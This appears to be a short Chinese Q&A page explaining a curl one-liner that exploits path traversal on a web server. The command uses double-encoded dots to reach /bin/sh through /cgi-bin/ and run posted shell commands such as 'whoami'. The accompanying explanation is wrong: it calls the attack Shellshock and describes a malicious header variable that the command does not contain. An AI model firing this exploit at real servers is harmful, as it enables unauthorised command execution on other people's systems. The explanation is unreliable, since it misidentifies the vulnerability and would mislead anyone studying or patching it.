curl -s --path-as-is -d ‘echo Content-Type: text/plain; echo; whoami’ “http://ip:port//cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh”解析
时间: 2023-08-02 14:10:05 浏览: 191
这也是一个利用Shellshock漏洞的攻击代码。该攻击代码使用curl工具向一个CGI脚本发送POST请求,并在请求头中设置了一个恶意的环境变量,该变量的值包含了一条命令:whoami。然后攻击者利用Shellshock漏洞执行了/bin/sh命令,从而打开了一个可交互的Shell,并在该Shell中执行了whoami命令,最终输出当前用户的用户名。
需要注意的是,该攻击代码仅作为演示使用,仅在授权范围内使用,任何未授权使用造成的后果,由使用者自行承担。同时,Shellshock漏洞已经被修复,建议服务器管理员及时更新Bash shell版本,以免受到该漏洞的攻击。
阅读全文